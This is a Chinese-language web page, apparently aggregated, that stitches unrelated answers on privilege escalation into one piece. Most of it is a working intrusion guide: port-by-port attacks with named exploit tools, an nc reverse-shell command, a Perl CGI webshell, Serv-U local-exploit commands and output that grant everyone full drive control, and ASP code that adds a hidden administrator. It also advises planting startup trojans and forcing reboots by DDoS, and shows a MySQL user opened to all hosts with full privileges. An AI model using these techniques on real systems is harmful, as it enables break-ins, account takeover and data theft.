php.exe提權,php提權linux教程

本文目錄一覽:

怎樣注入PHP網站提權3389權限

查找可用的注入點,注入後得到管理員帳號密碼進後台傳小馬後再大馬提權OK

WINDOWS 7 怎樣完全提權???

新建一個文本文檔 複製以下內容到新建的文檔中

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]

@=”獲取管理員權限”

“NoWorkingDirectory”=””

[HKEY_CLASSES_ROOT\*\shell\runas\command]

@=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”

“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”

[HKEY_CLASSES_ROOT\exefile\shell\runas2]

@=”獲取管理員權限”

“NoWorkingDirectory”=””

[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]

@=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”

“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”

[HKEY_CLASSES_ROOT\Directory\shell\runas]

@=”獲取管理員權限”

“NoWorkingDirectory”=””

[HKEY_CLASSES_ROOT\Directory\shell\runas\command]

@=”cmd.exe /c takeown /f \”%1\” /r /d y icacls \”%1\” /grant administrators:F /t”

“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” /r /d y icacls \”%1\” /grant administrators:F /t”

現在關閉此文檔 並且文件名保存為 提權.reg

現在打開剛才做好的文件 點擊確定導入註冊表

在需要提權的文件上點擊右鍵 會有一個獲取管理員權限選項 點擊一個黑框閃過

你就提權了。。。。如果是一個目錄黑框會多顯示一會 待它自動關閉即可

php提權能控制整個主機嗎,如同從本機登陸遠程3389主機

2/4分步閱讀

遠程連接服務器之前首先需要把基本的準備工作做好,比如首先在服務器創建一個新的網站,並把相應的網站內容上傳好。

我這裡以wdcp linux服務器為例子,如下圖所示創建一個新的網站

2/3

通過flashfxp等軟件將網站上傳至服務器

3/3

進入phpmyadmin,導入sql文件

連接遠程數據庫

1/4

選擇該數據庫,然後點擊權限,可以看到如下圖所示,然後點擊下方添加新用戶

2/4

然後輸入新用戶信息:

1、輸入用戶名

2、主機:選擇任意主機,然後輸入 % 

(開啟mysql本身的遠程連接,簡單說,就是在創建mysql用戶時的主機名,使用IP,域名,或%號就可以,”%”代表所有,也就是任何人和機器都可以連接,只要有用戶密碼,也可以針對IP,域名來做限制)

3、生成密碼

4、全局權限:全選

5、最後執行

3/4

通過以上步驟就生成了一個可以遠程訪問的數據庫,然後通過更改網站配置文件,php文件配置路徑如下圖,選擇database.php,然後打開文件

如何找漏洞,又怎樣利用它提權

1. 1433端口入侵

scanport.exe 查有1433的機器

SQLScanPass.exe 進行字典暴破(字典是關鍵)

最後 SQLTools.exe入侵

對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口

(以上反向的,測試成功)

sqlhelloz.exe 入侵ip 1433 (這個是正向連接)

2. 4899端口入侵

用4899過濾器.exe,掃描空口令的機器

3. 3899的入侵

對很早的機器,可以試試3389的溢出(win3389ex.exe)

對2000的機器,可以試試字典暴破。(tscrack.exe)

4. 80入侵

對sp3以前的機器,可以用webdav入侵;

對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL進行注入。(啊D的注入軟件)。

5. serv-u入侵(21端口)

對5. 004及以下系統,可用溢出入侵。(serv5004.exe)

對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)

對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)

輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系統漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

進行溢出入侵。

9. 3127等端口

可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

經典IPC$入侵

本篇文章結合了許多高手提升權限的技巧和自己的一些想法

當我們取得一個webshell時候,下一部要做的就是提升權限

個人總結如下:

1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸

2.C:\WINNT\system32\config\

進這裡下它的SAM,破解用戶的密碼

用到破解sam密碼的軟件有LC,SAMinside

3.C:\Documents and Settings\All Users\「開始」菜單\程序\

看這裡能跳轉不,我們從這裡可以獲取好多有用的信息

可以看見好多快捷方式,我們一般選擇Serv-U的,然後本地查看屬性,知道路徑後,看能否跳轉

進去後,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYValues=

這個用戶具有最高權限,然後我們就可以ftp上去 quote site exec xxx 來提升權限

4.c:\winnt\system32\inetsrv\data\

就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行

5.看能否跳轉到如下目錄

c:\php, 用phpspy

c:\prel,有時候不一定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, “HTMLPRE\r\n”, 13);

open(STDERR, “STDOUT”) || die “Can’t redirect STDERR”;

system($execthis);

syswrite(STDOUT, “\r\n/PRE/HTML\r\n”, 17);

close(STDERR);

close(STDOUT);

exit;

保存為cgi執行,

如果不行,可以試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交

顯示”拒絕訪問”,表示可以執行了!馬上提交:先的上傳個su.exe(ser-u提升權限的工具)到 prel的bin目錄

\perl\bin\su.exe

返回:

Serv-u 3.x Local Exploit by xiaolu

USAGE: serv-u.exe “command”

Example: serv-u.exe “nc.exe -l -p 99 -e cmd.exe”

現在是 IUSR 權限,提交:

\perl\bin\su.exe “cacls.exe c: /E /T /G everyone:F”

\perl\bin\su.exe “cacls.exe d: /E /T /G everyone:F”

\perl\bin\su.exe “cacls.exe e: /E /T /G everyone:F”

\perl\bin\su.exe “cacls.exe f: /E /T /G everyone:F”

如果返回下面的信息,就表示成功了

Serv-u 3.x Local Exploit by xiaolu

220 Serv-U FTP Server v5.2 for WinSock ready…

USER LocalAdministrator

331 User name okay, need password.

******************************************************

PASS #l@$ak#.lk;0@P

230 User logged in, proceed.

******************************************************

SITE MAINTENANCE

******************************************************

[+] Creating New Domain…

200-DomainID=2

220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting…

USER xl

331 User name okay, need password.

******************************************************

PASS 111111

230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

220 Domain deleted

這樣所有分區為everyone完全控制

現在我們把自己的用戶提升為管理員:

\perl\bin\su.exe ” net localgroup administrators IUSR_anyhost /add”

6.可以成功運行”cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps”來提升權限

用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再將asp.dll加入特權一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)

我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps “C:\WINNT\system32\idq.dll” “C:\WINNT\system32\inetsrv\httpext.dll” “C:\WINNT\system32\inetsrv\httpodbc.dll” “C:\WINNT\system32\inetsrv\ssinc.dll” “C:\WINNT\system32\msw3prt.dll””c:\winnt\system32\inetsrv\asp.dll”

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

7.還可以用這段代碼試提升,好象效果不明顯

%@codepage=936%%Response.Expires=0

on error resume next

Session.TimeOut=50

Server.ScriptTimeout=3000

set lp=Server.CreateObject(“WSCRIPT.NETWORK”)

oz=”WinNT://”lp.ComputerName

Set ob=GetObject(oz)

Set oe=GetObject(oz”/Administrators,group”)

Set od=ob.Create(“user”,”WekweN$”)

od.SetPassword “WekweN” —–密碼

od.SetInfo

Set of=GetObject(oz”/WekweN$,user”)

oe.Add(of.ADsPath)

Response.write “WekweN$ 超級帳號建立成功!”%

用這段代碼檢查是否提升成功

%@codepage=936%

%Response.Expires=0

on error resume next ‘查找Administrators組帳號

Set tN=server.CreateObject(“Wscript.Network”)

Set objGroup=GetObject(“WinNT://”tN.ComputerName”/Administrators,group”)

For Each admin in objGroup.Members

Response.write admin.Name”br”

Next

if err then

Response.write “不行啊:Wscript.Network”

end if

%

8.C:\Program Files\Java Web Start\

這裡如果可以,一般很小,可以嘗試用jsp的webshell,聽說權限很小,本人沒有遇見過。

9.最後了,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動”寫入bat,vbs等木馬。

等到主機重啟或者你ddos逼它重啟,來達到權限提升的目的。

總結起來說就是,找到有執行和寫入的目錄,管他什麼目錄,然後上傳提升工具,最後執行,三個字”找” “上””執”

以上是本人的拙見,大家有什麼好的方法多多分享

如何用手機提權u880,2.2.2的,謝謝

工具自己找下吧

U880提權及刷入recovery的方法和步驟

方法一:使用子規製作的一鍵root、刷入recovery包提權、刷入recovery。

步驟1:安裝相應ROM版本的joinme軟件(沒有刷B10版本底包的同學可直接用官方標配的光盤安裝,已經硬刷至B10版本的同學請卸載舊版Joinme後,將手機連接電腦後點擊我的電腦—點擊名為JOINME的盤符——安裝JOINME);安裝結束後右鍵我的電腦---進入設備管理器, 發現有ADB interface項之後便可進行ROOT操作了,如果未發現請重啟計算機再試。 2011-8-2 21:50:13 上傳下載附件 (9.29 KB)

步驟2:下載子規製作的一鍵root、添加recovery包並解壓至電腦任意盤符下(不可放入手機SD卡上運行),在此過程中殺毒軟件會報發現病毒,將ROOT程序設為信任就可以了,實在不行請先關閉殺毒軟件。

步驟3:運行“一鍵ROOT-u880-v2.1.exe”文件,然後按照指示完成操作就可以完成提權(在重啟機器之後,在程序列表裡出現一個叫授權管理的小骷髏頭,那說明你成功ROOT了) 或刷入recovery了。

2011-8-2 21:53:55 上傳下載附件 (83.34 KB)

方法二:

步驟1:同以上方法的步驟一。

步驟2:下載並打開superoneclick,在Universal界面下點擊root鍵就可以了,在重啟機器之後,在程序列表裡出現一個叫授權管理的小骷髏頭,那說明你成功ROOT了。

2011-8-2 22:17:32 上傳下載附件 (39.82 KB)

數據銀行網盤附件:

【DBank網盤】SuperOneClick v1.9.1.rar(1.37M)

數據銀行網盤附件:

【DBank網盤】

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hant/n/297217.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-28 12:15
下一篇 2024-12-28 12:15

相關推薦

  • PHP和Python哪個好找工作?

    PHP和Python都是非常流行的編程語言,它們被廣泛應用於不同領域的開發中。但是,在考慮擇業方向的時候,很多人都會有一個問題:PHP和Python哪個好找工作?這篇文章將從多個方…

    編程 2025-04-29
  • MQTT使用教程

    MQTT是一種輕量級的消息傳輸協議,適用於物聯網領域中的設備與雲端、設備與設備之間的數據傳輸。本文將介紹使用MQTT實現設備與雲端數據傳輸的方法和注意事項。 一、準備工作 在使用M…

    編程 2025-04-29
  • Python3.6.5下載安裝教程

    Python是一種面向對象、解釋型計算機程序語言。它是一門動態語言,因為它不會對程序員提前聲明變量類型,而是在變量第一次賦值時自動識別該變量的類型。 Python3.6.5是Pyt…

    編程 2025-04-29
  • Deepin系統分區設置教程

    本教程將會詳細介紹Deepin系統如何進行分區設置,分享多種方式讓您了解如何規劃您的硬盤。 一、分區的基本知識 在進行Deepin系統分區設置之前,我們需要了解一些基本分區概念。 …

    編程 2025-04-29
  • 寫代碼新手教程

    本文將從語言選擇、學習方法、編碼規範以及常見問題解答等多個方面,為編程新手提供實用、簡明的教程。 一、語言選擇 作為編程新手,選擇一門編程語言是很關鍵的一步。以下是幾個有代表性的編…

    編程 2025-04-29
  • Qt雷達探測教程

    本文主要介紹如何使用Qt開發雷達探測程序,並展示一個簡單的雷達探測示例。 一、環境準備 在開始本教程之前,需要確保你的開發環境已經安裝Qt和Qt Creator。如果沒有安裝,可以…

    編程 2025-04-29
  • 猿編程python免費全套教程400集

    想要學習Python編程嗎?猿編程python免費全套教程400集是一個不錯的選擇!下面我們來詳細了解一下這個教程。 一、課程內容 猿編程python免費全套教程400集包含了從P…

    編程 2025-04-29
  • Python煙花教程

    Python煙花代碼在近年來越來越受到人們的歡迎,因為它可以讓我們在終端里玩煙花,不僅具有視覺美感,還可以通過代碼實現動畫和音效。本教程將詳細介紹Python煙花代碼的實現原理和模…

    編程 2025-04-29
  • PHP怎麼接幣

    想要在自己的網站或應用中接受比特幣等加密貨幣的支付,就需要對該加密貨幣擁有一定的了解,並使用對應的API進行開發。本文將從多個方面詳細闡述如何使用PHP接受加密貨幣的支付。 一、環…

    編程 2025-04-29
  • 使用Snare服務收集日誌:完整教程

    本教程將介紹如何使用Snare服務收集Windows服務器上的日誌,並將其發送到遠程服務器進行集中管理。 一、安裝和配置Snare 1、下載Snare安裝程序並安裝。 https:…

    編程 2025-04-29

發表回復

登錄後才能評論